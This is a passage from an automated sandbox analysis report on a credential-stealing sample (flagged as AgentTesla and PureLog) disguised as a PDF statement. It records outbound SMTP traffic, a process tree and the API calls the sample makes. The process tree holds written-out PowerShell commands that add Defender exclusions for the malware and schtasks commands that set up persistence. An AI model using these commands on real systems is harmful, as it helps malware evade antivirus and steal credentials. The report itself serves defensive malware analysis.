                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:04:09.286797047 CEST | 49735 | 587 | 192.168.2.5 | 50.87.195.61 | EHLO 035347
                                Apr 26, 2024 09:04:09.298635960 CEST | 587 | 49734 | 50.87.195.61 | 192.168.2.5 | 220-box2344.bluehost.com ESMTP Exim 4.96.2 #2 Fri, 26 Apr 2024 01:04:09 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Apr 26, 2024 09:04:09.298736095 CEST | 49734 | 587 | 192.168.2.5 | 50.87.195.61 | EHLO 035347
                                Apr 26, 2024 09:04:09.483458042 CEST | 587 | 49735 | 50.87.195.61 | 192.168.2.5 | 250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                                Apr 26, 2024 09:04:09.495381117 CEST | 587 | 49734 | 50.87.195.61 | 192.168.2.5 | 250-box2344.bluehost.com Hello 035347 [102.129.152.220]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPECONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP

                                Target ID:0
                                Start time:09:01:51
                                Start date:26/04/2024
                                Path:C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe"
                                Imagebase:0x630000
                                File size:722'944 bytes
                                MD5 hash:7A6E9D01D9162C7537BA8091187E4235
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2071533656.0000000003B69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2075260613.0000000005260000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2071533656.00000000048BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2071533656.00000000048BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Target ID:3
                                Start time:09:01:55
                                Start date:26/04/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe"
                                Imagebase:0xd90000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:09:01:55
                                Start date:26/04/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:09:01:55
                                Start date:26/04/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eeBIYZL.exe"
                                Imagebase:0xd90000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:6
                                Start time:09:01:55
                                Start date:26/04/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:7
                                Start time:09:01:55
                                Start date:26/04/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpCB26.tmp"
                                Imagebase:0x120000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:8
                                Start time:09:01:55
                                Start date:26/04/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:9
                                Start time:09:01:56
                                Start date:26/04/2024
                                Path:C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exe"
                                Imagebase:0x640000
                                File size:722'944 bytes
                                MD5 hash:7A6E9D01D9162C7537BA8091187E4235
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3282089409.000000000288C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3273741870.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3273741870.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.3282089409.0000000002861000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3282089409.0000000002861000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3282089409.0000000002894000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:false

                                Target ID:10
                                Start time:09:01:57
                                Start date:26/04/2024
                                Path:C:\Users\user\AppData\Roaming\eeBIYZL.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\eeBIYZL.exe
                                Imagebase:0x90000
                                File size:722'944 bytes
                                MD5 hash:7A6E9D01D9162C7537BA8091187E4235
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2132450490.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2132450490.0000000003FAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 45%, ReversingLabs
                                • Detection: 52%, Virustotal, Browse
                                Reputation:low
                                Has exited:true

                                Target ID:11
                                Start time:09:01:57
                                Start date:26/04/2024
                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Imagebase:0x7ff6ef0c0000
                                File size:496'640 bytes
                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                Has elevated privileges:true
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:12
                                Start time:09:02:01
                                Start date:26/04/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmpE2E4.tmp"
                                Imagebase:0x120000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:13
                                Start time:09:02:01
                                Start date:26/04/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:14
                                Start time:09:02:01
                                Start date:26/04/2024
                                Path:C:\Users\user\AppData\Roaming\eeBIYZL.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\eeBIYZL.exe"
                                Imagebase:0x9e0000
                                File size:722'944 bytes
                                MD5 hash:7A6E9D01D9162C7537BA8091187E4235
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3282284281.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3282284281.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3282284281.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3282284281.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:false

                                Target ID:15
                                Start time:09:02:06
                                Start date:26/04/2024
                                Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                Imagebase:0xba0000
                                File size:722'944 bytes
                                MD5 hash:7A6E9D01D9162C7537BA8091187E4235
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2229738944.0000000004BEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.2229738944.0000000004BEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 45%, ReversingLabs
                                • Detection: 52%, Virustotal, Browse
                                Reputation:low
                                Has exited:true

                                Target ID:17
                                Start time:09:02:11
                                Start date:26/04/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmp9B5.tmp"
                                Imagebase:0x120000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:18
                                Start time:09:02:11
                                Start date:26/04/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:19
                                Start time:09:02:11
                                Start date:26/04/2024
                                Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                Imagebase:0x320000
                                File size:722'944 bytes
                                MD5 hash:7A6E9D01D9162C7537BA8091187E4235
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:20
                                Start time:09:02:11
                                Start date:26/04/2024
                                Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                Imagebase:0xeb0000
                                File size:722'944 bytes
                                MD5 hash:7A6E9D01D9162C7537BA8091187E4235
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.3285357778.00000000034FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.3285357778.0000000003504000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.3285357778.00000000034D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.3285357778.00000000034D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:false

                                Target ID:21
                                Start time:09:02:16
                                Start date:26/04/2024
                                Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                Imagebase:0x4b0000
                                File size:722'944 bytes
                                MD5 hash:7A6E9D01D9162C7537BA8091187E4235
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2316615219.00000000045FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.2316615219.00000000045FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Has exited:true

                                Target ID:22
                                Start time:09:02:20
                                Start date:26/04/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eeBIYZL" /XML "C:\Users\user\AppData\Local\Temp\tmp2ADA.tmp"
                                Imagebase:0x120000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:23
                                Start time:09:02:20
                                Start date:26/04/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:24
                                Start time:09:02:20
                                Start date:26/04/2024
                                Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                Imagebase:0xde0000
                                File size:722'944 bytes
                                MD5 hash:7A6E9D01D9162C7537BA8091187E4235
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.3283970574.0000000003244000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.3283970574.000000000323C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.3283970574.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.3283970574.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Has exited:false


                                  Execution Graph

                                  Execution Coverage:10.4%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:260
                                  Total number of Limit Nodes:12

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00E1D876
                                  • GetCurrentThread.KERNEL32 ref: 00E1D8B3
                                  • GetCurrentProcess.KERNEL32 ref: 00E1D8F0
                                  • GetCurrentThreadId.KERNEL32 ref: 00E1D949
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069979331.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 03b491f416c4f39b7a7ea9713596524d205d2a79879fb6ee8808fdf7b466dda9
                                  • Instruction ID: 7947f88a9e1b423b01cdf83796fc1860ed1a5471bbf7c050a95b556825d027ed
                                  • Opcode Fuzzy Hash: 03b491f416c4f39b7a7ea9713596524d205d2a79879fb6ee8808fdf7b466dda9
                                  • Instruction Fuzzy Hash: 7B5137B09007498FDB14DFA9D948BDEBBF5EF88314F208459E019A73A0D7789984CB65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070CD4E6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: c0dca4269b29425ed3e4ccc8a2aeeec7174e9741b37902be259b85913d1508cd
                                  • Instruction ID: 46d281617325de522ac138cd2ff3df2a1499754b0650c0c5ff490a56b36cc333
                                  • Opcode Fuzzy Hash: c0dca4269b29425ed3e4ccc8a2aeeec7174e9741b37902be259b85913d1508cd
                                  • Instruction Fuzzy Hash: 8CA15EB1E0021ADFDB14DF68C9417EDBBF2BF48314F1482A9E819A7290DB749985CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070CD4E6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: c5b5d2d49414f91611dde4649f2e324c247a053220658c87308e8363bc8c26df
                                  • Instruction ID: fc468929be06e10de68ad40ff2a0a23e3796558042d5ca3027e865fc38240370
                                  • Opcode Fuzzy Hash: c5b5d2d49414f91611dde4649f2e324c247a053220658c87308e8363bc8c26df
                                  • Instruction Fuzzy Hash: 47914EB1E0021ADFDB14DF68C9417EDBBF2BF48314F1482A9E819A7290DB749985CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  [Graph not reproduced. Legend: Executed / Not Executed. The graph covers e1b55f-e1b7f0 and includes a GetModuleHandleW call node at e1b7a8-e1b7d3.]
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069979331.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0bfc29520e48843e25ce26fc9ee30250f858dfb20ecaea48aa3de96c17e52ebb
                                  • Instruction ID: 9a05c3ede9ea2e94380edaca78f5de5f98854e9053a670bd7bca3db6202def6e
                                  • Opcode Fuzzy Hash: 0bfc29520e48843e25ce26fc9ee30250f858dfb20ecaea48aa3de96c17e52ebb
                                  • Instruction Fuzzy Hash: F2816970A00B058FD724DF29D54479ABBF6FF88304F10892ED08AEBA51D734E985CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F422E2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2074098336.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4f40000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 63fb25b6224d0207f4457745ae1bf345a21b7ac5db3c871e6db5ffbd053fa0a5
                                  • Instruction ID: ba908b4ac00b89f11a264f6fa43d9c7223e728ba5c369a39d59d61e791055edb
                                  • Opcode Fuzzy Hash: 63fb25b6224d0207f4457745ae1bf345a21b7ac5db3c871e6db5ffbd053fa0a5
                                  • Instruction Fuzzy Hash: FE51E2B0D003099FDB14CF99C984ADEBFB5FF88340F24816AE818AB250D774A946CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F422E2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2074098336.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4f40000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 8a81266774ffd1e7bcf926dc30f7cb91c51b774739d55440c88ad42831643151
                                  • Instruction ID: eeaf909fb9573524c296ec4c1d619dcc2300fd14aa76c0730bd9b54f153e73c5
                                  • Opcode Fuzzy Hash: 8a81266774ffd1e7bcf926dc30f7cb91c51b774739d55440c88ad42831643151
                                  • Instruction Fuzzy Hash: A041B0B1D003499FDB14CF99C984ADEBFB5FF88310F25856AE818AB210D774A985CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00E159C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069979331.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 776ea552b5e15fa04ff2851495007cc781763a503968a6fc6848845267aed71f
                                  • Instruction ID: e2c4d616e32108a83fac57546b859d1ef01c3af485988d49e84500034f2e70af
                                  • Opcode Fuzzy Hash: 776ea552b5e15fa04ff2851495007cc781763a503968a6fc6848845267aed71f
                                  • Instruction Fuzzy Hash: 5F4101B1D00619CEDB25CFA9C884BDDBBB5BF89304F2481AAD008AB255DB755986CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 04F44861
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2074098336.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4f40000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: CallProcWindow
                                  • String ID:
                                  • API String ID: 2714655100-0
                                  • Opcode ID: f59a3fe780a89439daf0b1a24a389f19425751d8b4716ac9242e3ab9f13c593a
                                  • Instruction ID: 9f535396e75edbd0361417f859ce80b3926e05f8672a8fb74f2c0678d38e9a28
                                  • Opcode Fuzzy Hash: f59a3fe780a89439daf0b1a24a389f19425751d8b4716ac9242e3ab9f13c593a
                                  • Instruction Fuzzy Hash: 0641F9B5A00249DFDB14CF99C488BAABBF5FF88314F24C499D519AB321D774A841CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00E159C9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069979331.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 57e6c7fe2631781da494308d79fa12d1a6daac98abf27da1e67f743847cd00be
                                  • Instruction ID: a1435d98649a6bbbd812e3b305b9cdca0d65cdb075593d7a55e8797bc886428b
                                  • Opcode Fuzzy Hash: 57e6c7fe2631781da494308d79fa12d1a6daac98abf27da1e67f743847cd00be
                                  • Instruction Fuzzy Hash: 1A41F2B1C00719CBDB24CFA9C884BDDBBB5BF89304F20806AD418AB255DB755985CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070CD0B8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 85cc01d42675e012241b62ead04c75ef108d261226789f8200e8754d75a914d0
                                  • Instruction ID: 7b14f3c8610de34a29b1c84442bfcd22d4d6f9ba8f0baef3de709c751d34962d
                                  • Opcode Fuzzy Hash: 85cc01d42675e012241b62ead04c75ef108d261226789f8200e8754d75a914d0
                                  • Instruction Fuzzy Hash: 3A2148B19003099FDB10DFAAC9857DEBBF1FF48310F10842AE558A7240D7789945CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070CD0B8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 69e3f70270a2069b1572367fe017740eec20a360134438bb7626480ab8302494
                                  • Instruction ID: 928aaa8941e424024f9620cd4324aadffabb2172923cd7161d70b2883426e7c8
                                  • Opcode Fuzzy Hash: 69e3f70270a2069b1572367fe017740eec20a360134438bb7626480ab8302494
                                  • Instruction Fuzzy Hash: 022136B19003099FDB10DFAAC985BEEBBF5FF48310F10842AE919A7240D7789945CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070CCF0E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
